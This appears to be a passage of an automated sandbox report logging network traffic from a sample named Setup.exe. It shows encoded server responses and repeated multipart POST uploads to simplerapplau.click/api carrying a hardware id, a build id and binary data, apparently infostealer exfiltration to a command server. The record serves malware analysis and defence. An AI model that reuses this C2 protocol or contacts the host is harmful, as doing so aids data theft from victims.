                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ijJJrXEXw93FOCBiLt%2FQkIEeXRehhvZqEdYEVs2Px9wPKSCm3ae%2BC4as8sWXh6qtkDNdnrFvhkT8vyLYsfEvpXD4nRS4zZbnoY1CqMbCcuxzJlf0q90bZDQi07JGkC8BKdFrOmCz"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8f40e06429fc7d0c-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2414&min_rtt=2414&rtt_var=1207&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4236&recv_bytes=981&delivery_rate=192930&cwnd=156&unsent_bytes=0&cid=58f793640a6ab3d0&ts=4388&x=0"
                                                                                                                      2024-12-18 17:29:45 UTC334INData Raw: 31 64 34 36 0d 0a 62 4d 6e 59 35 2b 73 57 4b 68 47 55 30 2b 79 75 61 37 6c 51 39 55 45 4b 38 5a 61 79 45 4e 64 31 56 32 5a 50 50 58 36 61 34 6c 41 58 36 36 37 46 30 53 49 47 4d 2b 65 32 7a 70 51 4e 32 44 79 47 4a 43 62 54 39 39 59 79 37 52 4d 32 43 6a 78 59 55 72 69 55 50 55 37 7a 76 6f 61 48 5a 55 38 39 74 72 61 55 6a 46 48 69 4b 39 63 6b 5a 4e 4f 73 6b 48 57 39 46 7a 59 4b 4c 56 77 56 39 5a 49 38 44 36 47 30 67 49 4e 7a 53 58 58 31 76 34 48 4c 44 74 77 78 6e 79 39 6a 6e 50 37 66 4d 76 74 58 4d 68 78 74 42 31 7a 58 68 79 51 4e 68 4c 6d 55 67 44 52 58 50 65 2f 78 69 63 42 4a 67 33 4b 55 4a 47 69 64 38 4e 5a 37 76 78 30 2f 41 69 78 5a 46 4f 71 4c 4e 67 53 68 75 6f 4f 43 65 55 42 68 2b 4c 57 47 77 41 6a 57 4d 64 64 74 4b 4a 54 73 6b 43 72 31 52 41 63 48 50
                                                                                                                      Data Ascii: 1d46bMnY5+sWKhGU0+yua7lQ9UEK8ZayENd1V2ZPPX6a4lAX667F0SIGM+e2zpQN2DyGJCbT99Yy7RM2CjxYUriUPU7zvoaHZU89traUjFHiK9ckZNOskHW9FzYKLVwV9ZI8D6G0gINzSXX1v4HLDtwxny9jnP7fMvtXMhxtB1zXhyQNhLmUgDRXPe/xicBJg3KUJGid8NZ7vx0/AixZFOqLNgShuoOCeUBh+LWGwAjWMddtKJTskCr1RAcHP
                                                                                                                      2024-12-18 17:29:45 UTC1369INData Raw: 6f 52 6f 6b 52 44 49 52 42 62 69 48 50 6b 37 7a 2b 6f 4f 48 64 55 56 7a 35 4c 6d 46 78 77 7a 4a 4f 5a 34 75 5a 5a 50 35 32 6e 32 32 46 7a 49 4f 4a 31 41 57 2f 49 30 2f 43 4b 75 36 78 63 63 30 54 32 75 32 36 63 37 76 44 4d 73 31 6d 7a 55 71 71 62 54 50 50 4b 78 58 4d 67 68 74 42 31 7a 77 68 54 45 4e 6f 4c 57 47 67 58 39 61 63 2b 53 33 67 38 6b 62 33 54 65 5a 4b 57 75 42 2f 74 35 30 74 68 34 2b 44 53 68 59 47 4c 6a 4f 63 67 6d 7a 2b 74 33 4a 56 55 56 34 2b 72 75 5a 7a 45 6e 45 66 49 35 6a 62 35 2b 30 69 44 4b 78 46 6a 45 46 4b 56 45 53 2f 49 77 30 41 4b 61 31 67 34 4e 30 54 33 6e 2b 75 59 2f 42 41 74 51 79 6b 69 35 73 6c 66 6a 52 64 2f 56 5a 64 51 4d 31 48 30 53 34 72 6a 55 4e 75 66 69 77 69 6e 70 47 64 4f 44 78 6b 59 49 51 6d 7a 57 62 59 7a 44 54 2b 74 56
                                                                                                                      Data Ascii: oRokRDIRBbiHPk7z+oOHdUVz5LmFxwzJOZ4uZZP52n22FzIOJ1AW/I0/CKu6xcc0T2u26c7vDMs1mzUqqbTPPKxXMghtB1zwhTENoLWGgX9ac+S3g8kb3TeZKWuB/t50th4+DShYGLjOcgmz+t3JVUV4+ruZzEnEfI5jb5+0iDKxFjEFKVES/Iw0AKa1g4N0T3n+uY/BAtQyki5slfjRd/VZdQM1H0S4rjUNufiwinpGdODxkYIQmzWbYzDT+tV
                                                                                                                      2024-12-18 17:29:45 UTC1369INData Raw: 30 51 71 52 31 79 67 77 41 4d 5a 6f 50 69 77 69 6e 70 47 64 4f 44 78 6b 59 49 51 6d 7a 57 62 59 7a 44 54 2b 64 68 33 73 42 67 30 44 69 4e 61 46 76 53 49 50 41 32 35 74 59 47 4a 65 45 42 35 2b 37 2b 4b 78 41 44 51 4f 5a 45 6a 61 5a 6d 30 6e 6a 4b 79 44 33 56 63 62 57 73 62 39 49 30 39 54 4a 36 35 69 34 64 7a 58 6a 50 70 2f 35 65 4d 44 74 64 79 7a 32 4e 6b 6d 76 54 62 65 4c 45 58 4d 67 6b 6f 58 42 76 37 6a 54 55 45 70 62 32 42 68 58 31 46 64 66 61 32 69 73 6b 62 33 6a 75 62 4c 79 6a 64 74 4e 64 71 39 55 39 31 4b 79 70 4a 48 39 65 44 49 77 66 72 70 63 75 51 4e 45 39 2f 74 75 6e 4f 79 77 7a 54 4f 5a 45 72 61 49 48 78 33 6e 6d 30 48 54 4d 46 49 46 4d 61 2b 49 45 79 43 4b 65 36 67 6f 35 6d 57 6e 62 77 6f 34 53 4d 52 35 73 31 6a 32 4d 77 30 38 4c 41 5a 61 51 42
                                                                                                                      Data Ascii: 0QqR1ygwAMZoPiwinpGdODxkYIQmzWbYzDT+dh3sBg0DiNaFvSIPA25tYGJeEB5+7+KxADQOZEjaZm0njKyD3VcbWsb9I09TJ65i4dzXjPp/5eMDtdyz2NkmvTbeLEXMgkoXBv7jTUEpb2BhX1Fdfa2iskb3jubLyjdtNdq9U91KypJH9eDIwfrpcuQNE9/tunOywzTOZEraIHx3nm0HTMFIFMa+IEyCKe6go5mWnbwo4SMR5s1j2Mw08LAZaQB
                                                                                                                      2024-12-18 17:29:45 UTC1369INData Raw: 41 55 38 49 38 39 43 71 57 38 67 34 52 78 52 33 6e 6b 75 59 44 42 41 74 51 35 68 53 4e 6c 6c 2f 6a 55 65 72 34 64 64 55 70 74 57 41 53 34 32 48 49 37 70 72 57 46 69 6d 49 49 62 4c 69 6f 7a 73 73 46 6d 32 72 58 4c 32 61 54 2b 39 78 2b 76 68 38 30 43 43 4e 59 47 66 47 49 4f 68 79 71 76 6f 32 49 65 6b 64 79 38 72 53 4c 79 41 37 66 4e 4a 68 6a 4a 74 50 7a 79 44 4c 74 56 78 6f 6a 47 42 30 39 77 73 41 74 51 4c 4c 36 67 6f 55 30 45 44 50 36 73 6f 4c 45 42 74 30 37 6d 79 6c 68 6d 50 6a 62 64 72 6b 65 4d 41 49 73 57 68 6e 35 68 44 34 45 72 62 6d 47 68 6e 74 48 65 37 62 2f 7a 73 73 52 6d 32 72 58 42 6e 2b 59 2b 74 59 79 71 6c 6b 73 52 43 70 54 58 4b 44 41 50 67 65 74 76 49 43 46 64 55 35 37 38 37 6d 4b 7a 51 2f 64 4d 5a 67 6e 62 5a 4c 37 31 48 36 37 48 54 51 46 49
                                                                                                                      Data Ascii: AU8I89CqW8g4RxR3nkuYDBAtQ5hSNll/jUer4ddUptWAS42HI7prWFimIIbLiozssFm2rXL2aT+9x+vh80CCNYGfGIOhyqvo2Iekdy8rSLyA7fNJhjJtPzyDLtVxojGB09wsAtQLL6goU0EDP6soLEBt07mylhmPjbdrkeMAIsWhn5hD4ErbmGhntHe7b/zssRm2rXBn+Y+tYyqlksRCpTXKDAPgetvICFdU5787mKzQ/dMZgnbZL71H67HTQFI
                                                                                                                      2024-12-18 17:29:45 UTC1369INData Raw: 48 50 51 71 73 74 6f 4f 47 63 6b 6c 32 2f 4c 32 4a 79 51 4c 55 50 74 64 74 4b 4a 54 73 6b 43 72 31 4f 54 34 58 4f 6c 77 53 38 35 59 70 54 72 54 30 6e 4d 6c 7a 52 44 4f 75 38 59 33 48 41 74 38 79 6d 79 4e 73 6e 76 54 43 66 62 49 51 50 41 38 2f 56 52 76 2f 69 7a 6f 46 70 4c 79 58 68 58 70 61 64 75 53 6a 7a 6f 4a 4a 33 43 72 58 65 79 69 6c 38 38 42 69 74 6c 55 45 45 69 35 4a 46 2f 57 4d 63 68 48 6c 6f 38 57 4f 65 41 67 72 74 72 65 42 78 51 72 55 4d 35 34 76 5a 5a 62 39 31 58 4f 7a 45 7a 38 4f 4c 56 6b 61 2b 59 55 34 44 61 71 77 6a 49 35 38 54 33 44 6b 38 63 43 4d 44 73 4e 79 7a 32 4e 42 6c 4f 62 65 59 76 55 49 65 78 31 74 57 42 43 34 32 48 49 4b 6f 62 57 42 6a 6e 68 4f 64 76 43 38 6a 38 4d 49 32 7a 32 54 4b 47 47 56 39 64 31 33 75 42 4d 6e 44 69 5a 51 45 50
                                                                                                                      Data Ascii: HPQqstoOGckl2/L2JyQLUPtdtKJTskCr1OT4XOlwS85YpTrT0nMlzRDOu8Y3HAt8ymyNsnvTCfbIQPA8/VRv/izoFpLyXhXpaduSjzoJJ3CrXeyil88BitlUEEi5JF/WMchHlo8WOeAgrtreBxQrUM54vZZb91XOzEz8OLVka+YU4DaqwjI58T3Dk8cCMDsNyz2NBlObeYvUIex1tWBC42HIKobWBjnhOdvC8j8MI2z2TKGGV9d13uBMnDiZQEP
                                                                                                                      2024-12-18 17:29:45 UTC1369INData Raw: 72 72 43 49 69 6e 74 4c 59 66 65 33 6e 4d 77 45 30 53 43 64 4b 47 32 65 2b 64 31 78 73 78 45 2b 43 44 39 57 48 50 75 4c 63 6b 44 72 76 5a 33 4a 4c 41 68 51 34 61 65 45 79 77 58 4e 4f 5a 59 67 66 70 37 6b 6b 44 7a 31 42 6a 49 56 62 51 63 4b 36 4a 63 31 45 65 57 6a 78 59 35 34 43 43 75 32 74 34 66 4b 44 74 30 38 68 53 5a 75 6e 50 76 5a 65 37 45 66 4e 67 51 70 57 78 76 39 67 7a 34 46 72 4c 6d 4b 6a 58 31 47 65 76 6e 78 77 49 77 4f 77 33 4c 50 59 30 6d 49 39 39 78 2f 39 51 68 37 48 57 31 59 45 4c 6a 59 63 67 4b 6c 76 34 57 44 63 6b 78 32 38 4c 75 4c 7a 41 4c 59 50 5a 4d 6c 62 4a 7a 30 32 33 75 30 45 54 41 4f 4a 6c 6b 52 2b 34 59 30 54 75 58 36 67 70 45 30 45 44 50 57 71 6f 50 41 44 70 73 74 32 54 6f 6f 6c 50 69 51 4b 76 55 63 4f 51 41 71 58 78 48 37 69 44 63
                                                                                                                      Data Ascii: rrCIintLYfe3nMwE0SCdKG2e+d1xsxE+CD9WHPuLckDrvZ3JLAhQ4aeEywXNOZYgfp7kkDz1BjIVbQcK6Jc1EeWjxY54CCu2t4fKDt08hSZunPvZe7EfNgQpWxv9gz4FrLmKjX1GevnxwIwOw3LPY0mI99x/9Qh7HW1YELjYcgKlv4WDckx28LuLzALYPZMlbJz023u0ETAOJlkR+4Y0TuX6gpE0EDPWqoPADpst2ToolPiQKvUcOQAqXxH7iDc
                                                                                                                      2024-12-18 17:29:45 UTC323INData Raw: 4a 39 35 57 48 53 32 6a 73 43 4d 45 5a 74 71 31 78 5a 72 6e 66 72 58 5a 4b 52 61 45 68 49 6e 57 41 7a 2f 6c 7a 31 4f 35 66 71 44 79 53 77 62 50 62 61 31 6e 34 78 52 69 32 44 4d 64 6a 76 45 70 49 4a 74 2b 77 35 31 45 6d 30 48 54 72 62 41 49 45 37 7a 2b 73 4b 4b 5a 6c 70 31 39 61 65 4e 69 7a 66 6c 46 59 30 75 62 6f 54 6c 37 6b 79 79 44 54 67 43 4f 6b 35 51 37 59 4d 38 41 4b 79 73 78 63 63 30 52 7a 4f 75 69 4d 36 45 53 65 52 38 31 7a 73 6f 79 37 54 6c 63 62 73 5a 4d 68 49 38 45 6a 76 69 6a 54 51 5a 75 76 72 4c 79 58 49 49 4b 36 62 2f 7a 73 67 59 6d 32 72 48 63 54 50 47 70 34 63 69 35 77 68 37 48 57 31 4a 58 4b 44 53 66 45 36 35 2b 74 33 4a 4d 30 74 68 35 4c 65 4e 32 67 71 63 44 4b 6b 4e 62 35 58 78 31 32 4c 33 4f 54 34 51 4b 68 39 53 75 49 39 79 56 70 4c 36
                                                                                                                      Data Ascii: J95WHS2jsCMEZtq1xZrnfrXZKRaEhInWAz/lz1O5fqDySwbPba1n4xRi2DMdjvEpIJt+w51Em0HTrbAIE7z+sKKZlp19aeNizflFY0uboTl7kyyDTgCOk5Q7YM8AKysxcc0RzOuiM6ESeR81zsoy7TlcbsZMhI8EjvijTQZuvrLyXIIK6b/zsgYm2rHcTPGp4ci5wh7HW1JXKDSfE65+t3JM0th5LeN2gqcDKkNb5Xx12L3OT4QKh9SuI9yVpL6
                                                                                                                      2024-12-18 17:29:45 UTC1369INData Raw: 31 64 34 32 0d 0a 38 38 72 46 63 6a 52 48 55 4e 55 72 69 53 63 6c 62 72 2f 59 61 62 5a 6b 35 77 34 4c 4c 4a 38 6a 66 59 4a 4a 6f 73 59 35 4c 4b 37 6c 79 34 46 6a 59 4b 62 32 34 4b 39 5a 41 78 43 36 79 45 75 34 64 7a 58 48 54 34 74 34 36 4d 52 35 73 39 31 33 74 52 30 37 79 51 54 66 74 58 4c 55 52 31 48 79 6e 37 6a 6a 77 4a 76 61 76 49 71 6d 4a 46 66 50 32 77 7a 6f 4a 4a 33 58 4c 50 63 79 62 54 38 4d 45 79 37 55 64 6e 58 33 67 4d 53 36 6a 53 4c 55 43 79 2b 70 50 4a 4c 42 6f 39 74 71 50 4f 6c 45 6d 63 50 4a 6f 69 61 35 33 33 77 6d 43 7a 46 43 4d 48 61 6d 45 69 32 59 30 35 41 71 61 31 6a 72 64 4b 61 58 37 39 76 59 50 44 41 75 55 4d 67 69 42 6d 6e 66 50 47 59 2f 56 5a 64 51 74 74 42 79 57 34 79 48 49 78 35 66 71 64 79 53 77 49 52 76 57 2f 67 4d 73 66 79 6e 2b
                                                                                                                      Data Ascii: 1d4288rFcjRHUNUriSclbr/YabZk5w4LLJ8jfYJJosY5LK7ly4FjYKb24K9ZAxC6yEu4dzXHT4t46MR5s913tR07yQTftXLUR1Hyn7jjwJvavIqmJFfP2wzoJJ3XLPcybT8MEy7UdnX3gMS6jSLUCy+pPJLBo9tqPOlEmcPJoia533wmCzFCMHamEi2Y05Aqa1jrdKaX79vYPDAuUMgiBmnfPGY/VZdQttByW4yHIx5fqdySwIRvW/gMsfyn+
                                                                                                                      2024-12-18 17:29:45 UTC1369INData Raw: 62 53 49 4d 76 49 55 4a 78 59 72 58 41 72 37 78 77 77 77 6a 71 32 47 6d 58 4a 4c 54 63 69 61 67 73 6f 4f 77 54 57 52 42 55 6a 54 75 70 42 39 39 55 38 4d 52 47 55 66 49 37 62 41 4b 6b 37 7a 2b 72 43 4b 65 6b 5a 30 34 4b 44 44 36 52 37 59 49 70 45 67 4b 4e 32 30 31 6a 4c 74 52 33 74 45 4b 55 35 63 6f 4e 42 67 56 66 37 70 30 74 6b 6d 56 7a 33 76 38 5a 69 4d 55 59 6c 38 31 7a 45 6f 79 37 53 58 63 61 63 46 4d 77 63 37 58 46 76 47 76 68 51 4e 75 72 43 6b 68 47 52 50 54 63 69 6b 6a 63 49 48 33 43 53 47 59 79 62 54 2b 35 41 71 6a 46 64 39 53 43 74 63 43 72 69 2f 66 45 36 7a 2b 74 33 4a 51 55 74 39 2b 4c 61 59 33 55 54 39 4d 59 59 70 53 5a 37 6b 31 7a 4c 37 56 7a 4e 45 64 51 78 53 75 49 51 6a 54 76 50 71 31 39 49 68 47 79 53 6d 34 35 47 43 45 4a 73 6b 31 33 73 36
                                                                                                                      Data Ascii: bSIMvIUJxYrXAr7xwwwjq2GmXJLTciagsoOwTWRBUjTupB99U8MRGUfI7bAKk7z+rCKekZ04KDD6R7YIpEgKN201jLtR3tEKU5coNBgVf7p0tkmVz3v8ZiMUYl81zEoy7SXcacFMwc7XFvGvhQNurCkhGRPTcikjcIH3CSGYybT+5AqjFd9SCtcCri/fE6z+t3JQUt9+LaY3UT9MYYpSZ7k1zL7VzNEdQxSuIQjTvPq19IhGySm45GCEJsk13s6


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.749764104.21.88.1994437128C:\Users\user\Desktop\Setup.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 17:29:47 UTC276OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=OSOPAWUPK
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 12789
                                                                                                                      Host: simplerapplau.click
                                                                                                                      2024-12-18 17:29:47 UTC12789OUTData Raw: 2d 2d 4f 53 4f 50 41 57 55 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 32 42 37 36 39 44 38 39 30 34 33 39 31 39 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 4f 53 4f 50 41 57 55 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 53 4f 50 41 57 55 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 4f 53 4f 50 41 57 55 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                      Data Ascii: --OSOPAWUPKContent-Disposition: form-data; name="hwid"442B769D890439192A161345CD0A71E7--OSOPAWUPKContent-Disposition: form-data; name="pid"2--OSOPAWUPKContent-Disposition: form-data; name="lid"hRjzG3--VIKA--OSOPAWUPKContent-Dispo
                                                                                                                      2024-12-18 17:29:48 UTC1039INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 18 Dec 2024 17:29:48 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=tt4nnopqjub4f0gvl1dv75qag5; expires=Sun, 13-Apr-2025 11:16:26 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=439Ai7YRMKeTBm%2F0CoCVqgS0eAh5QVgU4HZf9E6ex9Ro52lRR04a78Jz8Ck2c2Ga0z139Xl1TXxEs2LIvnC9lkWxJCxOlo1kk0DJNX5JlNop30e%2BExwdWGIkPBpBjvoByi6do0tZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8f40e0875c2041f3-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2491&min_rtt=1746&rtt_var=1187&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2849&recv_bytes=13723&delivery_rate=1672394&cwnd=223&unsent_bytes=0&cid=0b3f44362237165d&ts=1524&x=0"
                                                                                                                      2024-12-18 17:29:48 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                      2024-12-18 17:29:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.749769104.21.88.1994437128C:\Users\user\Desktop\Setup.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 17:29:50 UTC276OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=95U070K97
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 15021
                                                                                                                      Host: simplerapplau.click
                                                                                                                      2024-12-18 17:29:50 UTC15021OUTData Raw: 2d 2d 39 35 55 30 37 30 4b 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 32 42 37 36 39 44 38 39 30 34 33 39 31 39 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 39 35 55 30 37 30 4b 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 35 55 30 37 30 4b 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 39 35 55 30 37 30 4b 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                      Data Ascii: --95U070K97Content-Disposition: form-data; name="hwid"442B769D890439192A161345CD0A71E7--95U070K97Content-Disposition: form-data; name="pid"2--95U070K97Content-Disposition: form-data; name="lid"hRjzG3--VIKA--95U070K97Content-Dispo
                                                                                                                      2024-12-18 17:29:55 UTC1049INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 18 Dec 2024 17:29:55 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=51b0a0nd7pf0tqhmr0b7aep3kl; expires=Sun, 13-Apr-2025 11:16:31 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y9rkv44bL0PPGvftviBz2%2Bc0am%2BEYWle7OQIhWyeEVcLQZk1qgIaDkjCmdw1Xn90ejdNwFYuX0%2BV%2BhzD403pzvMAppk%2FoU1jwvUOF3QTWbuuRg%2BCG%2BSfdAdAqlxBK8fak2KpPUY2"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8f40e09a8c400f93-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1731&rtt_var=779&sent=14&recv=19&lost=0&retrans=0&sent_bytes=2849&recv_bytes=15955&delivery_rate=1686886&cwnd=168&unsent_bytes=0&cid=2402b2312e03dd95&ts=5308&x=0"
                                                                                                                      2024-12-18 17:29:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                      2024-12-18 17:29:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.749784104.21.88.1994437128C:\Users\user\Desktop\Setup.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 17:29:57 UTC281OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=ON1XKKPRLZQFFS
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 20376
                                                                                                                      Host: simplerapplau.click
                                                                                                                      2024-12-18 17:29:57 UTC15331OUTData Raw: 2d 2d 4f 4e 31 58 4b 4b 50 52 4c 5a 51 46 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 32 42 37 36 39 44 38 39 30 34 33 39 31 39 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 4f 4e 31 58 4b 4b 50 52 4c 5a 51 46 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 4e 31 58 4b 4b 50 52 4c 5a 51 46 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 4f 4e 31 58 4b 4b 50 52 4c
                                                                                                                      Data Ascii: --ON1XKKPRLZQFFSContent-Disposition: form-data; name="hwid"442B769D890439192A161345CD0A71E7--ON1XKKPRLZQFFSContent-Disposition: form-data; name="pid"3--ON1XKKPRLZQFFSContent-Disposition: form-data; name="lid"hRjzG3--VIKA--ON1XKKPRL
                                                                                                                      2024-12-18 17:29:57 UTC5045OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                      2024-12-18 17:30:01 UTC1050INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 18 Dec 2024 17:30:01 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=4dlv36782oavstgjsitqfa1iss; expires=Sun, 13-Apr-2025 11:16:37 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPat8Zli81YLfGTrjvvJLONnvudD0oF8WURIHW%2BinkROqmeOMUr7%2BWZS2k2%2Bu2LUc1mu6GJMDu4OtTYgcQOhNF39iYwwrC%2BaymFdbZPX0oByYKIkeAOlW%2BDeenx7%2B7bLFAz0lNLe"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8f40e0c5eb9e0f59-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
